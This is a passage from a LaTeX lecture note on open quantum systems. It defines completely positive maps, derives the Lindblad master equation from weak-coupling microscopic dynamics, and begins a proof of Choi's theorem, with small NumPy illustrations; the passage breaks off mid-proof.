\vspace{0.5cm}
\begin{definition}
A map ${\cal V}$ is positive iff $\forall A\in B({\cal H})$ s.t. $A \ge 0 \Rightarrow {\cal V} A \ge 0$.
\end{definition}
\vspace{0.5cm}
\noindent
This definition is based on the idea that, as density matrices are positive, any physical map should transform positive matrices into positive matrices. One could naively think that this condition must be sufficient to guarantee the physical validity of a map. It is not. As we know, there exist composite systems, and our density matrix could be the partial trace of a more complicated state. Because of that, we need to impose a more general condition.
\vspace{0.5cm}
\begin{definition}
A map ${\cal V}$ is completely positive iff $\forall n\in \mathbb{N}$, ${\cal V}\otimes \mathbb 1_n$ is positive.
\end{definition}
\vspace{0.5cm}
\noindent
To prove that not all positive maps are completely positive, we need a counterexample. A canonical example of an operation that is positive but fails to be completely positive is matrix transposition. If we have a Bell state in the form $\ket{\psi_B}=\frac{1}{\sqrt{2}} \pare{\ket{01}+\ket{10}}$, its density matrix can be expressed as
\begin{equation}
\rho_B=\frac{1}{2} \pare{\op{0}{0} \otimes \op{1}{1} + \op{1}{1} \otimes \op{0}{0} + \op{0}{1} \otimes\op{1}{0} + \op{1}{0} \otimes\op{0}{1}},
\end{equation}
with a matrix representation
\begin{eqnarray}
\rho_B= \frac{1}{2} \left\{
\left(
\begin{array}{cc}
1 & 0 \\
0 & 0 \\
\end{array}
\right)
\otimes
\left(
\begin{array}{cc}
0 & 0 \\
0 & 1 \\
\end{array}
\right)
+
\left(
\begin{array}{cc}
0 & 0 \\
0 & 1 \\
\end{array}
\right)
\otimes
\left(
\begin{array}{cc}
1 & 0 \\
0 & 0 \\
\end{array}
\right)
\right.
\nonumber\\
\left.
+
\left(
\begin{array}{cc}
0 & 0 \\
1 & 0 \\
\end{array}
\right)
\otimes
\left(
\begin{array}{cc}
0 & 1 \\
0 & 0 \\
\end{array}
\right)
+
\left(
\begin{array}{cc}
0 & 1 \\
0 & 0\\
\end{array}
\right)
\otimes
\left(
\begin{array}{cc}
0 & 0 \\
1 & 0 \\
\end{array}
\right)
\right\}.
\end{eqnarray}
A little algebra shows that the full form of this matrix is
\begin{equation}
\rho_B=\frac{1}{2}\left(
\begin{array}{cccc}
0 & 0 & 0 & 0\\
0 & 1 & 1 & 0\\
0 & 1 & 1 & 0\\
0 & 0 & 0 & 0
\end{array}
\right),
\end{equation}
and it is positive.
It is easy to check that the transformation $\mathbb 1\otimes T_2 $, meaning that we transpose the matrix of the second subsystem, leads to a non-positive matrix
\begin{eqnarray}
\pare{ \mathbb 1\otimes T_2 } \rho_B= \frac{1}{2} \left\{
\left(
\begin{array}{cc}
1 & 0 \\
0 & 0 \\
\end{array}
\right)
\otimes
\left(
\begin{array}{cc}
0 & 0 \\
0 & 1 \\
\end{array}
\right)
+
\left(
\begin{array}{cc}
0 & 0 \\
0 & 1 \\
\end{array}
\right)
\otimes
\left(
\begin{array}{cc}
1 & 0 \\
0 & 0 \\
\end{array}
\right)
\right.
\nonumber\\
\left.
+
\left(
\begin{array}{cc}
0 & 1 \\
0 & 0 \\
\end{array}
\right)
\otimes
\left(
\begin{array}{cc}
0 & 1 \\
0 & 0 \\
\end{array}
\right)
+
\left(
\begin{array}{cc}
0 & 0 \\
1 & 0 \\
\end{array}
\right)
\otimes
\left(
\begin{array}{cc}
0 & 0 \\
1 & 0 \\
\end{array}
\right)
\right\}.
\end{eqnarray}
The total matrix is
\begin{equation}
\pare{ \mathbb 1\otimes T_2 } \rho_B=
\frac{1}{2}
\left(
\begin{array}{cccc}
0 & 0 & 0 & 1\\
0 & 1 & 0 & 0\\
0 & 0 & 1 & 0\\
1 & 0 & 0 & 0
\end{array}
\right),
\end{equation}
which has $-\frac{1}{2}$ as an eigenvalue. This example illustrates how the non-separability of quantum mechanics restricts the operations we can perform on a subsystem. By imposing these two conditions, we can derive a unique master equation as the generator of any possible Markovian CPT-map.
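This counterexample can be reproduced numerically. The following NumPy sketch (the reshape-based implementation of $\mathbb 1\otimes T_2$ is a standard trick; the tolerance values are our own choices) checks that the normalised $\rho_B$ is positive while its partial transpose has a negative eigenvalue:

```python
import numpy as np

# Bell state |psi_B> = (|01> + |10>)/sqrt(2) in the product basis {|00>,|01>,|10>,|11>}
psi = np.array([0.0, 1.0, 1.0, 0.0]) / np.sqrt(2)
rho = np.outer(psi, psi.conj())          # rho_B, with the 1/2 normalisation included

eig_rho = np.linalg.eigvalsh(rho)        # all eigenvalues >= 0: rho_B is positive

# Partial transpose on the second qubit: view rho as a 4-index tensor
# rho[i,j;k,l] and swap the second-subsystem indices j <-> l
rho_pt = rho.reshape(2, 2, 2, 2).transpose(0, 3, 2, 1).reshape(4, 4)
eig_pt = np.linalg.eigvalsh(rho_pt)      # smallest eigenvalue is -1/2
```

The appearance of a negative eigenvalue after $\mathbb 1\otimes T_2$ is precisely the Peres-Horodecki criterion detecting the entanglement of $\ket{\psi_B}$.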
\subsection{Derivation of the Lindblad Equation from microscopic dynamics}
The most common derivation of the Lindblad master equation is based on the theory of open quantum systems, where the Lindblad equation arises as an effective equation of motion for a subsystem of a larger system. This derivation can be found in several textbooks, such as Breuer and Petruccione's \cite{breuer_02} and Gardiner and Zoller's \cite{gardiner_00}. Here, we follow the derivation presented in Ref. \cite{manzano:av18}. Our starting point is displayed in Figure \ref{fig:fig01}. A total system belonging to a Hilbert space ${\cal H}_T$ is divided into our system of interest, belonging to a Hilbert space ${\cal H}$, and the environment, living in ${\cal H}_E$.
\begin{figure}
\begin{center}
\includegraphics[scale=0.2]{figure01}
\end{center}
\caption{A total system (belonging to a Hilbert space ${\cal H}_T$, with states described by density matrices $\rho_T$, and with dynamics determined by a Hamiltonian $H_T$) divided into the system of interest, `System', and the environment. }
\label{fig:fig01}
\end{figure}
The evolution of the total system is given by the von Neumann equation (\ref{eq:vne}),
\begin{equation}
\dot{\rho_T}(t)=-i \left[ H_T,\rho_T(t) \right].
\end{equation}
As we are interested in the dynamics of the system without the environment, we trace over the environment degrees of freedom to obtain the reduced density matrix of the system, $\rho(t)=\textrm{Tr}_E[\rho_T]$. To separate the effect of the total Hamiltonian on the system and on the environment, we divide it in the form $H_T=H \otimes \mathbb 1_E + \mathbb 1 \otimes H_E + \alpha H_I $, with $H\in B({\cal H})$, $H_E\in B({\cal H}_E)$, and $H_I\in B({\cal H}_T)$, where $\alpha$ measures the strength of the system-environment interaction. Therefore, we have a part acting on the system, a part acting on the environment, and the interaction term. Without losing any generality, the interaction term can be decomposed in the following way
\begin{equation}
H_I = \sum_i S_i \otimes E_i,
\label{eq:hint}
\end{equation}
with $S_i\in B({\cal H})$ and $E_i\in B({\cal H}_E)$\footnote{From now on we will not write the identity operators of the Hamiltonian terms explicitly when they can be inferred from the context.}.
To better describe the dynamics of the system, it is useful to work in the interaction picture (see Ref. \cite{galindo_pascual_90} for a detailed explanation about Schr\"odinger, Heisenberg, and interaction pictures). In the interaction picture, density matrices evolve with time due to the interaction Hamiltonian, while operators evolve with the system and environment Hamiltonian. An arbitrary operator $O\in {\cal B}({\cal H}_T)$ is represented in this picture by the time-dependent operator $\hat{O}(t)$, and its time evolution is
\begin{equation}
\hat{O}(t) = e^{i(H+H_E)t} \,O\, e^{-i(H+H_E)t}.
\end{equation}
The time evolution of the total density matrix is given in this picture by
\begin{equation}
\frac{d \hat{\rho}_T(t)}{dt} = -i \alpha \cor{\hat{H}_I(t),\hat{\rho}_T(t)}.
\label{eq:vnint}
\end{equation}
This equation can be easily integrated to give
\begin{equation}
\hat{\rho}_T(t) = \hat{\rho}_T(0) -i \alpha \int_0^t ds \cor{\hat{H}_I(s),\hat{\rho}_T(s)}.
\label{eq:integint}
\end{equation}
This formula gives the exact solution, but it still involves an integral over the total Hilbert space. It is also troublesome that the state $\hat{\rho}_T(t)$ depends on an integration of the density matrix over all previous times. To avoid that, we can insert Eq. (\ref{eq:integint}) into Eq. (\ref{eq:vnint}), giving
\begin{equation}
\frac{d \hat{\rho}_T(t)}{dt} = -i \alpha \cor{\hat{H}_I(t),\hat{\rho}_T(0)} -\alpha^2 \int_0^t ds \cor{ \hat{H}_I(t),\cor{\hat{H}_I(s),\hat{\rho}_T(s)} }.
\end{equation}
By applying this method one more time we obtain
\begin{equation}
\frac{d \hat{\rho}_T(t)}{dt} = -i \alpha \cor{\hat{H}_I(t),\hat{\rho}_T(0)} -\alpha^2 \int_0^t ds \cor{ \hat{H}_I(t),\cor{\hat{H}_I(s),\hat{\rho}_T(t)} } + O(\alpha^3).
\label{eq:orderthree}
\end{equation}
After this substitution, the integration over the previous states of the system is confined to the terms of order $\alpha^3$ or higher. At this point, we perform our first approximation: we consider the strength of the interaction between the system and the environment to be small, so we can neglect the higher-order terms in Eq. (\ref{eq:orderthree}). Under this approximation we have
\begin{equation}
\frac{d \hat{\rho}_T(t)}{dt} = -i \alpha \cor{\hat{H}_I(t),\hat{\rho}_T(0)} -\alpha^2 \int_0^t ds \cor{ \hat{H}_I(t),\cor{\hat{H}_I(s),\hat{\rho}_T(t)} }.
\label{eq:exp}
\end{equation}
We are interested in finding an equation of motion for $\rho$, so we trace over the environment degrees of freedom
\begin{equation}
\frac{d \hat{\rho}(t)}{dt}= \textrm{Tr}_E \left[\frac{d \hat{\rho}_T(t)}{dt} \right] = -i \alpha \textrm{Tr}_E\cor{\hat{H}_I(t),\hat{\rho}_T(0)} -\alpha^2 \int_0^t ds \textrm{Tr}_E\cor{ \hat{H}_I(t),\cor{\hat{H}_I(s),\hat{\rho}_T(t)} }.
\label{eq:exp2}
\end{equation}
This is not a closed time-evolution equation for $\hat{\rho}(t)$, because the time derivative still depends on the full density matrix $\hat{\rho}_T(t)$. To proceed, we need to make two more assumptions. First, we assume that at $t=0$ the system and the environment are in a separable state, $\rho_T(0)=\rho(0) \otimes \rho_E(0)$, meaning that there are no correlations between them. This may be the case if the system and the environment have not interacted at previous times, or if the correlations between them are short-lived. Second, we assume that the initial state of the environment is thermal, i.e.\ described by the density matrix $\rho_E(0)=\exp\left( -H_E/T \right)/\textrm{Tr}\left[\exp\left( -H_E/T \right)\right]$, where $T$ is the temperature and we set the Boltzmann constant $k_B=1$. By using these assumptions, and the expansion of $H_I$ (\ref{eq:hint}), we can calculate the first term on the r.h.s.\ of Eq. (\ref{eq:exp2}),
\begin{equation}
\textrm{Tr}_E\cor{\hat{H}_I(t),\hat{\rho}_T(0)} = \sum_i \left( \hat{S}_i(t) \hat{\rho}(0) \textrm{Tr}_E \left[ \hat{E}_i(t) \hat{\rho}_E(0) \right] -
\hat{\rho}(0) \hat{S}_i(t) \textrm{Tr}_E \left[ \hat{\rho}_E(0) \hat{E}_i(t) \right] \right).
\label{eq:zero}
\end{equation}
To calculate the explicit value of this term, we use that $\left< E_i\right>=\textrm{Tr}[E_i \rho_E(0)]=0$ for all values of $i$. This looks like a strong assumption, but it is not: if our total Hamiltonian does not fulfil it, we can always rewrite it as
$H_T=\left( H+ \alpha \sum_i \left< E_i\right> S_i\right) + H_E + \alpha H_I'$, with $H_I'= \sum_i S_i \otimes (E_i- \left< E_i\right>)$. It is clear that now $\left< E'_i \right>=0$, with $E'_i=E_i- \left< E_i\right>$, and the system Hamiltonian is changed only by an energy shift that does not affect the system dynamics. Because of that, we can assume $\left< E_i\right>=0$ for all $i$ without loss of generality. Using the cyclic property of the trace, it is then easy to prove that the term in Eq. (\ref{eq:zero}) vanishes, and the equation of motion (\ref{eq:exp2}) reduces to
\begin{equation}
\dot{\hat{\rho}}(t)= -\alpha^2 \int_0^t ds \textrm{Tr}_E\cor{ \hat{H}_I(t),\cor{\hat{H}_I(s),\hat{\rho}_T(t)} }.
\label{eq:exp3}
\end{equation}
This equation still includes the entire system-environment state. To disentangle the system from the environment, we have to make a more restrictive assumption. As we are working in the weak-coupling regime, we may suppose that the system and the environment remain uncorrelated during the whole time evolution. Of course, this is only an approximation: due to the interaction Hamiltonian, some correlations between system and environment are expected to appear. On the other hand, since the coupling strength is very small ($\alpha\ll 1$), we may assume that the correlation and relaxation timescales of the environment ($\tau_\text{corr}$ and $\tau_\text{rel}$) are much smaller than the typical system timescale ($\tau_\text{sys}$). Under this strong assumption, the environment state is always thermal and decoupled from the system state, $\hat{\rho}_T(t)=\hat{\rho}(t) \otimes \hat{\rho}_E(0)$, and Eq. (\ref{eq:exp3}) transforms into
\begin{equation}
\dot{\hat{\rho}}(t)= -\alpha^2 \int_0^t ds \textrm{Tr}_E\cor{ \hat{H}_I(t),\cor{\hat{H}_I(s),\hat{\rho}(t) \otimes \hat{\rho}_E(0)} }.
\end{equation}
The equation of motion is now independent for the system and local in time, but it is still non-Markovian, as it depends explicitly on the initial preparation time. We can obtain a Markovian equation by noting that the kernel of the integral decays rapidly for $s\gg\tau_\text{corr}$, so we can extend the upper limit of the integration to infinity with no significant change in the outcome. By doing so, and by changing the integration variable to $s\rightarrow t-s$, we obtain the famous {\it Redfield equation} \cite{redfield:IBM57},
\begin{equation}
\dot{\hat{\rho}}(t)= -\alpha^2 \int_0^{\infty} ds\, \textrm{Tr}_E\cor{ \hat{H}_I(t),\cor{\hat{H}_I(t-s),\hat{\rho}(t) \otimes \hat{\rho}_E(0)} }.
\label{eq:redfield}
\end{equation}
It is known that this equation does not guarantee the positivity of the map, and it sometimes gives rise to density matrices that are non-positive. To ensure complete positivity, we need to perform one further approximation, the {\it rotating wave} approximation. To do so, we use the spectrum of the superoperator $\tilde{H}A\equiv \cor{H,A}$, $\forall A\in {\cal B}({\cal H})$. The eigenvectors of this superoperator form a complete basis of the space ${\cal B}({\cal H})$ and, therefore, we can expand the system operators of the interaction Hamiltonian (\ref{eq:hint}) in this basis
\begin{equation}
S_i = \sum_{\omega} S_i(\omega),
\label{eq:expeigen}
\end{equation}
where the operators $S_i(\omega)$ fulfil
\begin{equation}
\cor{H,S_i(\omega)}= -\omega S_i(\omega),
\end{equation}
where $\omega$ are the eigenvalues of $\tilde{H}$. Taking the Hermitian conjugate, we also obtain
\begin{equation}
\cor{H,S_i^{\dagger}(\omega)}= \omega S_i^{\dagger}(\omega).
\end{equation}
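For a concrete instance of this eigenoperator structure, take a single qubit with ground state $\ket{0}$, excited state $\ket{1}$ and splitting $\omega_0$, coupled through $S=\sigma_x$. A minimal NumPy sketch (the value of $\omega_0$ is an arbitrary illustration) confirms that $\tilde{H}\sigma_-=-\omega_0\sigma_-$, so that $S(\omega_0)=\sigma_-$ and $S^\dagger(\omega_0)=\sigma_+$:

```python
import numpy as np

w0 = 1.3                                  # illustrative qubit frequency (assumption)
H  = 0.5 * w0 * np.diag([-1.0, 1.0])      # |0> ground state, |1> excited state
sm = np.array([[0.0, 1.0], [0.0, 0.0]])   # sigma_- = |0><1|
sp = sm.T                                 # sigma_+ = |1><0|

# sigma_- and sigma_+ are eigenoperators of the superoperator [H, .]:
comm_m = H @ sm - sm @ H                  # = -w0 * sigma_-  ->  S(w0)       = sigma_-
comm_p = H @ sp - sp @ H                  # = +w0 * sigma_+  ->  S(w0)^dag   = sigma_+

# hence the coupling operator S = sigma_x decomposes as S(w0) + S(w0)^dag
sx = sm + sp
```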
To apply this decomposition, we write the system part of the interaction Hamiltonian in the interaction picture (see Ref. \cite{galindo_pascual_90}), $\hat{S}_k(t)= e^{it H} S_k\, e^{-it H}$. By using the eigen-expansion (\ref{eq:expeigen}) we arrive at
\begin{equation}
\hat{H}_I(t) = \sum_{k,\omega} e^{-i\omega t} S_k(\omega) \otimes \hat{E}_k (t) = \sum_{k,\omega} e^{i\omega t} S_k^{\dagger}(\omega) \otimes \hat{E}_k^{\dagger} (t).
\end{equation}
To combine this decomposition with the Redfield equation (\ref{eq:redfield}), we first expand the commutators,
\begin{eqnarray}
\hspace{-2cm}
\dot{\hat{\rho}}(t)= -\alpha^2 \textrm{Tr}\left[ \int_0^\infty ds\, \hat{H}_I (t) \hat{H}_I (t-s) \hat{\rho} (t) \otimes \hat{\rho}_E(0)
- \int_0^\infty ds\, \hat{H}_I (t) \hat{\rho} (t) \otimes \hat{\rho}_E(0) \hat{H}_I (t-s) \right. \nonumber \\
\hspace{-2cm}
\left. - \int_0^\infty ds\, \hat{H}_I (t-s) \hat{\rho} (t) \otimes \hat{\rho}_E(0) \hat{H}_I (t)
+ \int_0^\infty ds\, \hat{\rho} (t) \otimes \hat{\rho}_E(0) \hat{H}_I (t-s) \hat{H}_I (t)
\right].
\end{eqnarray}
We now apply the eigenoperator decomposition, in terms of $S_k(\omega)$ for $\hat{H}_I(t-s)$ and in terms of $S_k^{\dagger}(\omega')$ for $\hat{H}_I(t)$. By using the cyclic property of the trace and the fact that $\cor{H_E,\rho_E(0)}=0$, and after some non-trivial algebra, we obtain
\begin{equation}
\dot{\hat{\rho}}(t) =\sum_{\substack{\omega,\omega'\\ k,l }} \left( e^{i (\omega'-\omega)t }\, \Gamma_{kl} (\omega) \cor{S_l(\omega)\hat{\rho} (t), S_k^\dagger(\omega') } +
e^{i (\omega-\omega')t } \, \Gamma_{lk}^* (\omega') \cor{S_l(\omega), \hat{\rho} (t) S_k^\dagger(\omega') } \right),
\label{eq:rwae}
\end{equation}
where the effect of the environment has been absorbed into the factors
\begin{equation}
\Gamma_{kl} (\omega) \equiv \int_0^{\infty} ds\, e^{i\omega s} \textrm{Tr}_E \left[ \hat{E}_k^\dagger (t) \hat{E}_l (t-s) \rho_E(0) \right],
\end{equation}
where the environment operators of the interaction Hamiltonian are written in the interaction picture ($\hat{E}_l(t)=e^{iH_Et} E_l e^{-iH_Et} $). At this point, we can perform the rotating wave approximation. By considering the time-dependency in Eq. (\ref{eq:rwae}), we conclude that the terms with $\left| \omega-\omega' \right|\gg\alpha^2$ oscillate much faster than the typical timescale of the system evolution and therefore do not contribute appreciably to it. In the weak-coupling regime $(\alpha\rightarrow 0)$ we can keep only the resonant terms, $\omega=\omega'$, and remove all the others. With this approximation, Eq. (\ref{eq:rwae}) reduces to
\begin{equation}
\dot{\hat{\rho}}(t) =\sum_{\substack{\omega\\ k,l }} \left( \Gamma_{kl} (\omega) \cor{S_l(\omega)\hat{\rho} (t), S_k^\dagger(\omega) } +
\Gamma_{lk}^* (\omega) \cor{S_l(\omega), \hat{\rho} (t) S_k^\dagger(\omega) } \right).
\end{equation}
To divide the dynamics into Hamiltonian and non-Hamiltonian parts, we now decompose the coefficients $\Gamma_{kl}$ into Hermitian and non-Hermitian parts, $\Gamma_{kl}(\omega) = \frac{1}{2} \gamma_{kl}(\omega) + i\pi_{kl}(\omega) $, with
\begin{eqnarray}
\pi_{kl}(\omega) \equiv \frac{-i}{2} \left(\Gamma_{kl} (\omega) - \Gamma_{kl}^*(\omega) \right) \nonumber\\
\gamma_{kl}(\omega) \equiv \Gamma_{kl} (\omega) + \Gamma_{kl}^*(\omega) = \int_{-\infty}^{\infty} ds e^{i\omega s}
\textrm{Tr}\left[ \hat{E}_k^\dagger (s) E_l \hat{\rho}_E(0)\right].
\end{eqnarray}
With these definitions, we can separate the Hermitian and non-Hermitian parts of the dynamics and transform back to the Schr\"odinger picture,
\begin{equation}
\dot{\rho}(t) = -i \left[ H+H_{Ls} ,\rho(t) \right] +
\sum_{\substack{\omega\\ k,l }} \gamma_{kl} (\omega) \left( S_l (\omega) \rho(t) S_k^\dagger (\omega) -
\frac{1}{2} \left\{ S_k^\dagger (\omega) S_l (\omega) , \rho(t) \right\} \right).
\label{eq:me1}
\end{equation}
The Hamiltonian dynamics now is influenced by a term $H_{Ls} = \sum_{\omega,k,l} \pi_{kl} (\omega) S_k^\dagger (\omega)S_l (\omega)$. This is usually called a {\it Lamb shift} Hamiltonian and its role is to renormalize the system energy levels due to the interaction with the environment. Eq. (\ref{eq:me1}) is the first version of the Markovian Master Equation, but it is not in the Lindblad form yet.
It can be proved that the matrix formed by the coefficients $\gamma_{kl}(\omega)$ is positive, as they are the Fourier transform of the positive-definite function $\textrm{Tr}\left[ \hat{E}_k^\dagger (s) E_l \hat{\rho}_E(0)\right]$. Therefore, this matrix can be diagonalised: we can find a unitary operator, $O$, s.t.
\begin{equation}
O\gamma(\omega) O^\dagger=
\left(\begin{array}{cccc}
d_1(\omega) & 0 & \cdots & 0\\
0 & d_2(\omega) & \cdots & 0 \\
\vdots & \vdots & \ddots & 0\\
0 & 0 & \cdots & d_N(\omega)
\end{array}\right).
\end{equation}
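This diagonalisation step is a plain unitary conjugation and is easy to check numerically. In the sketch below (the matrix $\gamma$ is an arbitrary positive example of our own), `numpy.linalg.eigh` supplies the eigenvectors, and $O=U^\dagger$ plays the role of the unitary above:

```python
import numpy as np

# Build an arbitrary positive-semidefinite "gamma" matrix (illustrative values)
A = np.array([[1.0, 0.3 - 0.2j], [0.1j, 0.8]])
gamma = A.conj().T @ A                    # positive by construction

d_vals, U = np.linalg.eigh(gamma)         # columns of U are orthonormal eigenvectors
D = U.conj().T @ gamma @ U                # unitary conjugation diagonalises gamma
```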
We can now write the master equation in a diagonal form
\begin{equation}
\dot{\rho}(t) = -i \left[ H+H_{Ls} ,\rho(t) \right] +
\sum_{i,\omega} \left( L_i (\omega) \rho(t) L_i^\dagger (\omega) -
\frac{1}{2} \left\{ L_i^\dagger (\omega) L_i (\omega) , \rho(t) \right\} \right)\equiv {\cal L} \rho(t).
\label{eq:me2}
\end{equation}
This is the celebrated Lindblad (or Lindblad-Gorini-Kossakowski-Sudarshan) Master Equation. In the simplest case, there will be only one relevant frequency $\omega$, and the equation can be further simplified to
\begin{equation}
\dot{\rho}(t) = -i \left[ H+H_{Ls} ,\rho(t) \right] +
\sum_{i} \left( L_i \rho(t) L_i^\dagger -
\frac{1}{2} \left\{ L_i^\dagger L_i, \rho(t) \right\} \right)\equiv {\cal L} \rho(t).
\label{eq:me3}
\end{equation}
The operators $L_i$ are usually referred to as {\it jump operators}.
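As a minimal numerical illustration of Eq. (\ref{eq:me3}) (a sketch of our own, not from the text: the parameter values are arbitrary and a first-order Euler step is used), consider a qubit with a single jump operator $L=\sqrt{\gamma}\,\sigma_-$. The evolution preserves the trace and positivity, and the excited population decays as $e^{-\gamma t}$:

```python
import numpy as np

w0, gamma = 1.0, 0.5                                  # illustrative parameters
H = 0.5 * w0 * np.diag([-1.0, 1.0])                   # qubit Hamiltonian
L = np.sqrt(gamma) * np.array([[0.0, 1.0],
                               [0.0, 0.0]])           # jump operator sqrt(gamma)*sigma_-

def lindblad_rhs(rho):
    """Right-hand side of the Lindblad equation for a single jump operator."""
    unitary = -1j * (H @ rho - rho @ H)
    LdL = L.conj().T @ L
    dissipator = L @ rho @ L.conj().T - 0.5 * (LdL @ rho + rho @ LdL)
    return unitary + dissipator

rho = np.array([[0.0, 0.0], [0.0, 1.0]], dtype=complex)  # start in the excited state
dt, steps = 1e-3, 2000
for _ in range(steps):
    rho = rho + dt * lindblad_rhs(rho)                # first-order Euler integration

pop_excited = rho[1, 1].real                          # ~ exp(-gamma * t)
```

In practice one would use a dedicated integrator (e.g.\ QuTiP's \texttt{mesolve}) rather than a bare Euler step; this sketch only makes trace preservation and the exponential decay explicit.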
\subsection{Derivation of the Lindblad Equation as a CPT generator}
The second way of deriving the Lindblad equation starts from the following question: what is the most general (Markovian) way of mapping density matrices onto density matrices? This is usually the approach of quantum information researchers, who look for general transformations of quantum systems. We analyse this problem following mainly Ref. \cite{wilde_17}.
To start, we need to know the form of a general CPT-map.
\vspace{0.5cm}
\begin{lemma}
Any map ${\cal V}:B\pare{{\cal H}}\to B\pare{{\cal H}}$ that can be written in the form ${\cal V}\rho=V^\dagger \rho V^{\phantom{\dagger}}$ with $V\in B\pare{{\cal H}}$ is positive.
\end{lemma}
\vspace{0.5cm}
\noindent
The proof of the lemma requires a little algebra and a known property of normal matrices
\vspace{0.5cm}
\noindent
\textbf{Proof.}
\noindent
If $\rho\ge0$, then $\rho=A^\dagger A^{\phantom{\dagger}}$ for some $A\in B({\cal H})$. Therefore, $\bra{\psi} V^\dagger\rho V\ket{\psi} = \bra{\psi} V^\dagger A^{\dagger}A V\ket{\psi}=\norm{ AV\ket{\psi}}^2\ge 0$ for all $\ket{\psi}$. Therefore, if $\rho$ is positive, the output of the map is also positive.
\vspace{0.25 cm}
\noindent
\textbf{End of the proof.}
\vspace{0.5cm}
\noindent
This is a sufficient condition for the positivity of a map, but it is not necessary: there may be positive maps that cannot be written in this form. To go further, we need a more general condition, and this comes in the form of the next theorem.
\vspace{0.5cm}
\begin{theorem}
Choi's Theorem.
\noindent
A linear map ${\cal V}:B({\cal H})\to B({\cal H})$ is completely positive iff it can be expressed as
\begin{equation}
{\cal V}\rho=\sum_i V_i^\dagger \rho V^{\phantom{\dagger}}_i
\label{eq:choimap}
\end{equation}
with $V_i\in B({\cal H})$.
\end{theorem}
\vspace{0.5cm}
\noindent
The proof of this theorem requires some algebra.
\vspace{0.5cm}
\noindent
\textbf{Proof.}
\noindent
The `if' implication is a trivial consequence of the previous lemma. To prove the converse, we need to extend the dimension of our system by the use of an auxiliary system. If $d$ is the dimension of the Hilbert space of pure states, ${\cal H}$, we define a new Hilbert space of the same dimension ${\cal H}_A$.
We define a maximally entangled pure state in the bipartition ${\cal H}_A \otimes {\cal H}$ in the way
\begin{equation}
\ket{\Gamma}\equiv \sum_{i=0}^{d-1} \ket{i}_A \otimes \ket{i},
\label{eq:gamma}
\end{equation}
where $\key{\ket{i}}$ and $\key{\ket{i}_A}$ are arbitrary orthonormal bases for ${\cal H}$ and ${\cal H}_A$, respectively.
We can extend the action of our original map ${\cal V}$, that acts on ${\cal B}({\cal H})$ to our extended Hilbert space by defining the map ${\cal V}_2:{\cal B}( {\cal H}_A) \otimes {\cal B}({\cal H}) \to {\cal B}( {\cal H}_A) \otimes {\cal B}({\cal H})$ as
\begin{equation}
{\cal V}_2\equiv \mathbb 1_{{\cal B}( {\cal H}_A)} \otimes {\cal V}.
\end{equation}
Note that the idea behind this map is to leave the auxiliary subsystem invariant while applying the original map to the system of interest. This map is positive because ${\cal V}$ is completely positive. This may appear trivial but, as explained before, complete positivity is a more restrictive property than positivity, and it is precisely a condition ensuring complete positivity that we are looking for.
We can now apply the extended map to the density matrix corresponding to the maximally entangled state (\ref{eq:gamma}), obtaining
\begin{equation}
{\cal V}_2 \proj{\Gamma} = \sum_{i,j=0}^{d-1} \op{i}{j} \otimes {\cal V} \op{i}{j}.
\label{eq:map2}
\end{equation}
Now we can use the maximal entanglement of the state $\ket{\Gamma}$ to relate the original map ${\cal V}$ and the action ${\cal V}_2 \proj{\Gamma}$ by taking the matrix elements with respect to ${\cal H}_A$.
\begin{equation}
{\cal V}\op{i}{j} = \bra{i}_A \pare{ {\cal V}_2\op{\Gamma}{\Gamma} }\ket{j}_A.
\label{eq:elementsv}
\end{equation}
To relate this operation to the action of the map on an arbitrary vector $\ket{\psi}\in {\cal H}_A \otimes {\cal H}$, we expand the vector in this basis as
\begin{equation}
\ket{\psi} = \sum_{i=0}^{d-1} \sum_{j=0}^{d-1} \alpha_{ij} \ket{i}_A \otimes \ket{j}.
\end{equation}
We can also define an operator $V_{\ket{\psi}}\equiv\sum_{i,j=0}^{d-1}\alpha_{ij}\op{j}{i} \in {\cal B} \pare{{\cal H}}$ that transforms $\ket{\Gamma}$ into $\ket{\psi}$. Its explicit action is
\begin{eqnarray}
\hspace{-2cm}
\pare{\mathbb 1_A \otimes V_{\ket{\psi}}} \ket{\Gamma}&=&\sum_{i,j=0}^{d-1} \alpha_{ij} \pare{\mathbb 1_A \otimes \op{j}{i} } \pare{ \sum_{k=0}^{d-1} \ket{k}_A \otimes \ket{k} }
= \sum_{i,j,k=0}^{d-1} \alpha_{ij} \pare{\ket{k}_A \otimes \ket{j}} \bracket{i}{k} \nonumber\\
&=& \sum_{i,j,k=0}^{d-1} \alpha_{ij} \pare{\ket{k}_A \otimes \ket{j}} \delta_{i,k}
= \sum_{i,j=0}^{d-1} \alpha_{ij} \ket{i}_A\otimes \ket{j} = \ket{\psi}.
\label{eq:opsi}
\end{eqnarray}
At this point, we have related the vectors of the extended space ${\cal H}_A \otimes {\cal H}$ to operators acting on ${\cal H}$. This can only be done because the vector $\ket{\Gamma}$ is maximally entangled. We go now back to our extended map ${\cal V}_2$. Its action on $\proj{\Gamma}$ is given by Eq. (\ref{eq:map2}) and, as ${\cal V}_2$ is positive, the operator ${\cal V}_2\pare{\proj{\Gamma}}$ is positive and can be expanded as
\begin{equation}
{\cal V}_2\pare{\proj{\Gamma}} =\sum_{l=0}^{d^2-1}\proj{v_l},
\label{eq:expchoi}
\end{equation}
with (in general unnormalised) vectors $\ket{v_l}\in{\cal H}_A\otimes {\cal H}$, which can be related to operators in ${\cal H}$ as in Eq. (\ref{eq:opsi}),
\begin{equation}
\ket{v_l}=\pare{\mathbb 1_A\otimes\ V_l}\ket{\Gamma}.
\end{equation}
Based on this result, we can calculate the overlap of an arbitrary basis vector $\ket{i}_A\in{\cal H}_A$ with $\ket{v_l}$,
\begin{equation}
\bra{i}_A \ket{v_l}=\bra{i}_A \pare{\mathbb 1_A \otimes V_l} \ket{\Gamma}= \sum_{k=0}^{d-1} \bracket{i}{k}_A \,V_l \ket{k} = V_l\ket{i}.
\end{equation}
This is the last ingredient we need for the proof.
We now come back to the original question: we want to characterise the map ${\cal V}$. We do so by applying it to an arbitrary basis element $\op{i}{j}$ of ${\cal B}\pare{{\cal H}}$,
\begin{eqnarray}
\hspace{-2.cm}
{\cal V}\pare{\op{i}{j}} = \pare{ \bra{i}_A \otimes \mathbb 1} {\cal V}_2\pare{\proj{\Gamma}} \pare{\ket{j}_A\otimes\mathbb 1}
= \pare{\bra{i}_A \otimes \mathbb 1} \cor{ \sum_{l=0}^{d^2-1} \proj{v_l} } \pare{ \ket{j}_A\otimes\mathbb 1 } \nonumber\\
= \sum_{l=0}^{d^2-1} \cor{\pare{\bra{i}_A \otimes \mathbb 1}\ket{v_l}} \cor{\bra{v_l}\pare{\ket{j}_A \otimes \mathbb 1}}
